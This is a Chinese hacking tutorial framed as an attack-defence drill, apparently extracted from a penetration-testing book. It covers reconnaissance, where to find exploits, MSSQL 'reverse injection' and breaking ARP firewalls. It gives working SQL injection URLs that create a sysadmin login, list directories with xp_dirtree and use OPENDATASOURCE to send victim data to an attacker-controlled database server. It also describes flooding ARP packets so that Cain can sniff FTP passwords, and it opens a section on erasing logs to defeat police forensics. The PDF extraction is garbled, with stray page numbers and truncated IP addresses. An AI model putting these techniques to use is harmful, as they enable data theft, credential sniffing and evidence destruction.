网络攻防演练文档设计

1、网络攻防演练文档设计目录文献参考：<<暗战亮剑黑客渗透与防御全程实录>>1.1 Web应用程序渗透前的信息收集21.1.1了解目标主机和网络的一些基本的安全信息21.1.2确定目标的域名和相关的网络信息21.1.3目标主机扫描测试31.2漏洞利用代码的收集31.2.1脚本漏洞利用代码的收集31.2.2 操作系统漏洞利用代码的获取41.3 MSSQL下的高级反弹注射技术41.3.1opendatasource函数语法51.3.2搭建本地MSSQL攻防环境61.3.3反弹注射之获取机密信息61.4黑客致命绝招之突破ARP防火墙91.4.1Cain配合Ncpharp挑战Ant

2、iarp防火墙91.5黑客反取证之痕迹擦除111.5.1操作系统常见日志111.5.2系统日志的擦除14 1.1 Web应用程序渗透前的信息收集 脚本渗透是如今比较流行的技术，运用该技术可轻松击溃一个Web站点。不同安全级别的站点，渗透的方式也是不一样的，其中涉及许多高级技巧。这些技巧都是黑客们的看家本领，一般是不愿意外传的。这里笔者向读者朋友揭秘高级脚本渗透技术的秘籍，重点学习高手们的渗透思路。1.1.1了解目标主机和网络的一些基本的安全信息踩点可以了解目标主机和网络的一些基本的安全信息，主要有：（1）.管理员联系信息，电话号，传真号,QQ号,电子邮件等。（2）.IP地址范围（3）.DNS服

3、务器（4）.邮件服务器1.1.2确定目标的域名和相关的网络信息Whois查询，通过Whois数据库查询可以得到以下的信息：（1）.注册机构：显示相关的注册信息和相关的Whois服务器（2）.机构本身：显示与某个特定机构相关的所有信息（3）.域名：显示与某个特定域名相关的所有信息（4）.网络：显示与某个特定网络或单个IP地址相关的所有信息（5）.联系点:显示与某位特定人员相关的所有信息1.1.3目标主机扫描测试透过扫描可以获取目标主机的安全弱点以及漏洞信息，主要有：（1）.端口扫描，透过端口开放情况可大致判断提供的服务信息。（2）.漏洞扫描，可以获取目标主机存在的漏洞，比如溢出漏洞。（3）.密码

4、破解，扫描工具可轻松的检测出当前系统的弱口令等信息。（4）.软件漏洞，通过扫描也可发现一些软件的漏洞，利用第三方软件漏洞实现系统攻击是目前比较流行的攻击手法。1.2漏洞利用代码的收集1.2.1脚本漏洞利用代码的收集在国内很多公司,企业,教育,政府部门的网站程序都是使用网上公开的商业程序或者免费整站程序，一旦这些整站程序出现安全问题，那么直接导致使用者的Web系统被攻击或者被渗透。虽然利用现成的整站程序构建网站系统成本较低，但是安全风险是无法回避的。在Web渗透中，黑客们常常遇到各种各样的整站程序，不同的整站程序会出现不同的安全漏洞，掌握这些安全漏洞是很有必要的。在渗透需要的时候，这些漏洞就会起

5、到很大的作用。根据笔者的渗透经验来谈，收集一些Web程序敏感路径,源码,漏洞利用工具,0DAY程序等是非常重要的，不仅可以充实你的“漏洞库”，而且可以对这些漏洞原理进行分析，总结其中的精髓，做到融会贯通。这里是笔者近期收集的一些脚本漏洞利用程序，如图1-1所示图1-1 漏洞利用程序同时国内比较出名的脚本程序漏洞公布站点Sebug，收集了海量国内外整站程序的漏洞信息，国内大多数整站程序漏洞信息在这里基本都能找到。其官方地址为： 如图1-2所示图1-2 sebug网站1.2.2 操作系统漏洞利用代码的获取当然脚本漏洞利用程序只对存在脚本漏洞的Web站点构成直接威胁，而对于渗透操作系统则需要更为高级

6、的漏洞利用程序。对操作系统而言，最为严重的莫过于远程溢出漏洞了，收集此类漏洞利用程序同样也变得异常重要。一般来说国外黑客站点会第一时间发布此类漏洞信息以及漏洞利用程序，关于获取这类漏洞信息可查看如下站点：/其中黑客站点milw0rm通常是国外0DAY程序的第一发布站点，如图1-3所示。图1-3 miw0rm官网1.3 MSSQL下的高级反弹注射技术MSSQL注射攻击是最为复杂的数据库攻击技术，由于该数据库功能十分强大，存储过程以及函数语句十分丰富，这些灵活的语句造就了新颖独特的攻击思路。黑客们深入钻研MSSQL数据库的精髓，将数据库攻击发挥得淋漓尽致。本

7、节笔者将继续给读者朋友讲解MSSQL数据库的一些高级攻击技术，将SQL数据库渗透发挥到极致。在尝试进行注射攻击的时候，难免会遇到会这样或者那样的问题。比如明明是SQL的注射点却无法进行注射,注射工具猜解的速度异常缓慢,错误提示信息关闭,无法返回注射结果等，这些都是在注射攻击中常常遇到的问题。为了解决以上这些疑难杂症，比较好的解决方法就是使用反弹注射技术，而反弹注射技术则需要依靠opendatasource函数支持。1.3.1opendatasource函数语法 学习任何技术，了解它的原理是非常重要的。只要把原理弄明白了，才能更好的研究和利用它。OPENDATASOURCE 函数可以在能够使用链

8、接服务器名的相同 Transact-SQL 语法位置中使用。因此，就可以将 OPENDATASOURCE 用作四部分名称的第一部分，该名称指的是 SELECT、INSERT、UPDATE 或 DELETE 语句中的表或视图的名称；或者指的是 EXECUTE 语句中的远程存储过程。当执行远程存储过程时，OPENDATASOURCE 应该指的是另一个 SQL Server。OPENDATASOURCE 不接受参数变量。与 OPENROWSET 函数类似，OPENDATASOURCE 应该只引用那些不经常访问的 OLE DB 数据源。对于访问次数稍多的任何数据源，请为它们定义链接的服务器。无论 OP

9、ENDATASOURCE 还是 OPENROWSET 都不能提供链接的服务器定义的全部功能，例如，安全管理以及查询目录信息的能力。每次调用 OPENDATASOURCE 时，都必须提供所有的连接信息（包括密码）。OPENDATASOURCE函数的语法参数如下：OPENDATASOURCE函数语法：OPENDATASOURCE ( provider_name, init_string )参数provider_name注册为用于访问数据源的 OLE DB 提供程序的 PROGID 的名称。provider_name 的数据类型为 char，没有默认值。init_string连接字符串，这些字符串将

10、要传递给目标提供程序的 IDataInitialize 接口。提供程序字符串语法是以关键字值对为基础的，这些关键字值对由分号隔开，例如："keyword1=value; keyword2=value."下边列出 init_string 参数中最常用的关键字：关键字 OLE DB 属性 有效值和描述 数据源 DBPROP_INIT_DATASOURCE 要连接的数据源的名称。不同的提供程序用不同的方法对此进行解释。对于 SQL Server OLE DB 提供程序来说，这会指明服务器的名称。对于 Jet OLE DB 提供程序来说，这会指明 .mdb 文件或 .xls 文件的

11、完整路径。 位置 DBPROP_INIT_LOCATION 要连接的数据库的位置。 扩展属性 DBPROP_INIT_PROVIDERSTRING 提供程序特定的连接字符串。 连接超时 DBPROP_INIT_TIMEOUT 超时值，在该超时值后，连接尝试将失败。 用户 ID DBPROP_AUTH_USERID 用于该连接的用户 ID。 密码 DBPROP_AUTH_PASSWORD 用于该连接的密码。 目录 DBPROP_INIT_CATALOG 连接到数据源时的初始或默认的目录名称。关于OPENDATASOURCE函数更加详细的信息，请参考“SQL SERVER联机丛书”。为了比较形象的

12、说明以上函数的用法，这里给出一个示例。该示例用于访问来自某个表的数据，该表在 SQL Server 的另一个实例中。SELECT *FROM OPENDATASOURCE( 'SQLOLEDB', 'Data Source=ServerName;User ID=MyUID;Password=MyPass' ).Northwind.dbo.Categories为了便于读者朋友理解OPENDATASOURCE函数的功能，笔者使用较为通俗的语言来说明：“使用OPENDATASOURCE函数将当前数据库中查询的结果发送到另一数据库服务器中”。这样应该比较容易理解。1.3

13、.2搭建本地MSSQL攻防环境 由于国家法律的要求，本节内容将采用虚拟机本地模拟渗透环境进行演示（注意：本地模拟和实际操作步骤完全一样）。本地服务器版本均使用WindowS 2003 SP2，除了构造带注射漏洞的web服务器外，另外还需要在一主机上安装SQL server2000数据库环境。具体环境如下：漏洞主机环境：WindowS 2003 SP2+IIS6.0+ASP+ SQL server2000漏洞主机IP地址：08攻击者主机环境：WindowS 2003 SP2+ SQL server2000攻击者主机IP地址：03关于如何构造有漏洞的注射

14、环境，已经做过详细介绍，不熟悉的朋友可以参考注射点伪造渗透一节的内容。笔者构造的注射链接如下：Http:/ 08/news.asp?id=10 以上漏洞链接采用DB_OWNER权限账户连接数据库。1.3.3反弹注射之获取机密信息 在MSSQL数据库的渗透中，若想快速获得webshell，采用差异备份的方式无疑是最快的，而如何获取Web绝对路径是一个关键，也是一个难点。对于获取Web绝对路径，已经介绍过很多种方法。在这里笔者将补充一种使用反弹技术获得绝对路径的方法。1.首先应该在攻击者主机的SQL server 2000中建立一个具有管理权限的数据库账户，具体命令如下：ex

15、ec master.dbo.sp_addlogin h4ck,h4ck;-exec master.dbo.sp_addsrvrolemember h4ck,sysadmin;-其中添加的用户名为h4ck，密码为h4ck。以上语句请在查询分析器中执行，如图1-4所示图1-4 执行添加用户命令2.使用建立的SQL账户登陆数据库，这里使用查询分析器进行连接。利用SQL语句建立一个数据库以及表和字段等。具体命令如下：create database test-use test create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarc

16、har(255),num3 nvarchar(255)其中建立一个名叫test的库，在test库下建立temp表以及id,num1, num2, num3等字段用于存放数据。查询分析器中执行语句，如图1-5所示图1-5 创建数据库表操作3.现在将视线转移到注射点（漏洞主机）上来，同样使用SQL语句在注射点上建立一个与攻击者数据库中temp表一模一样的表段，以便稍后存放数据。在注射点执行的命令如下:Http:/08/news.asp?id=10'create table temp(id nvarchar(255),num1 nvarchar(255),num2 nv

17、archar(255),num3 nvarchar(255)-由于我们是本地测试，可直接在漏洞主机上使用查询分析器执行。语句如下:create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255)-如图1-6所示图1-6 创建temp表以下进行的这二步非常关键，第一步将在漏洞主机进行列目录操作。在注射点执行如下命令：Http:/08/news.asp?id=10'insert into temp(id,num1,num2) exec master.d

18、bo.xp_dirtree 'c:',1,1使用xp_dirtree过程遍历c盘下的目录以及文件名，最后将结果插入到temp表中。这里我们使用查询分析器进行执行，执行语句如下：insert into temp(id,num1,num2) exec master.dbo.xp_dirtree 'c:',1,1如图1-7所示图1-7 执行语句现在该进行第二步了，这一步尤为关键。利用OPENDATASOURCE函数将temp表中存放的数据发送至远程数据库中，也就是发送到攻击者构造的数据库中。在注射点执行如下语句：Http:/08/news.asp

19、?id=10' insert into opendatasource('sqloledb','server=03,1433;uid=h4ck;pwd=h4ck;database=test').test.dbo.temp select * from temp-若在查询分析器中，可执行如下语句：insert into opendatasource('sqloledb','server=03,1433;uid=h4ck;pwd=h4ck;database=test').test.dbo

20、.temp select * from temp其中03为攻击者数据库服务器地址，1433为数据库默认端口，数据库用户名为h4ck,密码为h4ck,库名为test,要发送的内容为temp表中的数据。如图1-8所示图1-8 发送temp表数据4.数据成功发送后，我们需要查看本地数据库中的temp表是否接收到了数据。在查询分析器中执行如下语句：Select * from temp -显示temp表中所有的数据信息成功得到数据，如图1-9所示图1-9 得到机密数据通过以上的反复操作可找到Web的绝对路径，记得在操作之前先清空temp表中的数据。1.4黑客致命绝招之突破ARP防火

21、墙内网安全问题是一个极为严峻的问题，渗透者的各类攻击技法层出不穷，难以防范，黑客时刻对企业网络安全进行严峻的考验。随着Arp病毒的大规模爆发至今，企业一直饱受着Arp病毒的无情摧残，所以为了加固局域网安全。企业都会选择一些ARP防火墙作为自己的防护遁甲，经过这样简单的安全加固，能够防御大多数的ARP攻击，防御效率明显提高。但是网络攻击与安全防御都是对立发展的，相互推动。网络没有绝对的安全，黑客们已经找到如何突破ARP防火墙的高级技术了，这一高级技术使得ARP防火墙形同虚设。下面笔者以实例的方式详细讲解如何在内网渗透中对ARP防火墙的突破。1.4.1Cain配合Ncpharp挑战Antiarp防

22、火墙对于渗透软件软件防火墙，其实可以通过增加ARP包的发送速度，数据包的发送速度一定要比arp防火墙的速度快，告诉网关攻击者是被欺骗的主机ip地址和Mac地址，由于特定发包工具的速度比arp防火墙快，网关应对攻击者的响应包要多一些，这样自然就把我当成被欺骗的主机了。对于特定发包工具，笔者建议使用NCPH工作室出品的【ncpharp】。关于测试的环境，这里可以沿用前面配置的环境。首先开启Antiarp防火墙，将【防御状态】调整至【警戒-待命】。如图1-10所示图1-10将【防御状态】调整至【警戒-待命】使用Cain对目标主机06进行ARP嗅探测试，如图1-11所示图1-11

23、 ARP嗅探测试本地使用账户以及密码成功登陆FTP服务器，查看Antiarp防火墙状态。发现已经拦截到了多次ARP攻击。如图1-12所示图1-12 拦截到攻击数据包查看CAIN嗅探状态，结果没有嗅探到登陆的FTP密码。如图1-13所示图1-13 无任何嗅探数据要想成功ARP嗅探必须配合一款特定的发包工具，由于特定工具发包速度较快，笔者建议单独用一台计算机运行发包工具。在使用发包工具之前，需要配置一些基本信息。所需基本信息如下：网关ip地址以及MAC地址：00-25-86-3d-9b-96目标主机ip地址以及MAC地址：0600-0C-29-54-7E

24、-BB选择发包的网卡【Ncpharp】在使用前请确保安装了【WinPcap】软件，否则无法运行。【Ncpharp】基本配置情况，如图1-14所示图1-14 【Ncpharp】基本配置现在开启Cain对目标进行ARP嗅探测试，发现能够成功嗅探到FTP密码。如图1-15所示图1-15 嗅探到FTP明文数据包1.5黑客反取证之痕迹擦除一个成功的渗透者不仅具有高超的入侵技术,而且还需要具有良好的反侦察意识，在完成对特定目标的渗透后能做到全身而退，不留下任何痕迹，做到“来无影，去无踪”。 同时在撤退的过程中需要做大量的后期工作，清理掉在系统中所留下的一切痕迹，如果这个过程按照技术分类来划分的话，它属于计

25、算机反取证技术。计算机反取证就是删除或者隐藏入侵证据使取证工作无效。目前的计算机反取证技术主要有数据擦除、数据隐藏、数据加密等。数据擦除是最有效的反取证方法，它是指清除所有可能的证据（包括索引节点、目录文件和数据块中的原始数据等），原始数据不存在了，取证工作自然无法进行，严重阻碍网络警察的犯罪取证。同时对于计算机取证人员来说，研究反取证技术有特别的意义，不仅可以了解入侵者有哪些常用手段用来掩盖甚至擦除入侵痕迹，而且可以在这些手段的基础上，开发出更加有效、实用、针对性极强的计算机取证工具。1.5.1操作系统常见日志 日志文件是操作系统比较特别的文件，默默地记录着系统发生的一切事件。这些普通的日志

26、文件平常毫不起眼，显得微不足道。但是一旦发生安全事件，这些日志就成了最宝贵的数据，计算机取证人员会提取其中的关键日志进行分析，分析攻击者在系统中进行的各项操作，最后将这些信息整理出来成为控告攻击者最有说服力的犯罪证据。由此可以看出日志在计算机安全中显示了无可替代的作用。如果要擦除这些痕迹，攻击者必须熟悉操作系统中的日志相关的知识。1. 系统自带日志系统自带日志也是非常重要的日志，计算机取证人员通常会从这里下手提取一些数据。系统自带日志分为三类日志，具体如下:应用程序日志：记录了重要的应用程序产生的错误和成功信息。安全日志：主要记录着win2k操作系统的组件所产生的日志。系统日志：主要记录审核策

27、略的日志。关于如何查看系统日志，可依次作如下操作：“开始-设置控制面板-管理工具-事件查看器”。如图1-16所示图1-16事件查看器比如我们想查看是否被非法攻击者远程登陆过系统，可在事件查看器（本地）列表中选择“安全性” ，系统就会详细显示所有的登陆事件。如图1-17所示图1-17 详细显示所有的登陆事件可以根据时间或者登陆用户来判断用户登陆的事件，事件中显示了一个名叫hacker$的用户尝试登陆过系统，有经验的管理一看就知道有猫腻。选择此账户，右键选择“属性”可查看更多关于此账户的信息。如图1-18所示图1-18 查看更多关于此账户的信息事件详细信息显示：“该用户已经成功登陆，并且登陆服务器

28、所使用的IP地址为04。”这可以确定系统被入侵了，而且知道攻击者的IP地址，如果攻击者使用的真实的IP地址的话，那么他很危险，因为他忽略了系统日志对他构成的威胁。2. 服务器日志除了以上系统自带的基本日志外，服务器日志也是相当的重要，其中详细记录了网络用户对服务器资源的访问事件。服务器日志主要分为三类日志，具体如下:IIS日志：用于记录网络用户活动的细节信息。FTP日志：用于记录着所有用户的访问信息。DNS日志：用于记录DNS活动相关的事件信息。 目前网络上普遍使用微软的IIS作为网站的服务器，通常Web服务器最容易受到脚本黑客们的袭击，IIS日志显得格外重要，其中详细记

29、录了网络用户的活动信息。一般网站被黑客入侵，可通过分析IIS日志，找出攻击者的IP地址。关于如何查看IIS日志，可依次作如下操作：开始-设置控制面板-管理工具-Internet 信息服务(IIS)管理器-网站属性-启用日志记录-属性 如图1-19所示 图1-19 日志记录属性其中包含了日志的记录任务和日志的存放路径，打开该路径下的W3SVC1目录，可看到IIS相关的日志信息。其中日志默认按天进行记录的，比如我们要查看今天的日志，可直接双击日志文件“ex090711.log”（注意：今天是2009年7月11日），日志记录了详细的访问信息。如图1-20所示图1-20日志记录了详细的访问信息由图1-

30、20可知一陌生IP为17的用户向服务器发送过大量的请求，其中请求的页面都是网站的敏感路径，而且发送的请求速度非常快，手工是无法达到这样的速度，笔者可以断定攻击者使用的黑客扫描器进行探测的。由以上信息可以判断服务器在今天曾遭受过黑客的攻击。如果没有IIS日志记录，取证人员很难判断攻击者所处的位置。对于FTP日志和DNS日志的查看都是大同小异的，这里不再介绍。3. 系统防火墙日志通常防火墙是拦截外边攻击的第一道屏障，防火墙不仅可以阻挡攻击，而且对外部计算机尝试攻击的事件会详细记录在案，此工作通常交给日志来做，由此可见日志同样扮演了相当重要的作用。如何查看防火墙日志，可依次作如下操作：网上邻居-属性-更改WindowS防火墙设置-选择“高级”选项卡-安全日志记录-设置 如图1-21所示图1-21 日志设置记录选项中记录被丢弃的数据包和成功的连接的数据包，以及防火墙日志的存放路径和文件大小限制等信息。防火墙安全日志使用的格式为W3C扩展日志文件格式，可直接使用记事本打开。如图1-22所示图1-22 打开防火墙日志文件一般防火墙的日志容量比较大，笔者建议使用专业的日志分析软件进行分析。4. 系统终端登陆日志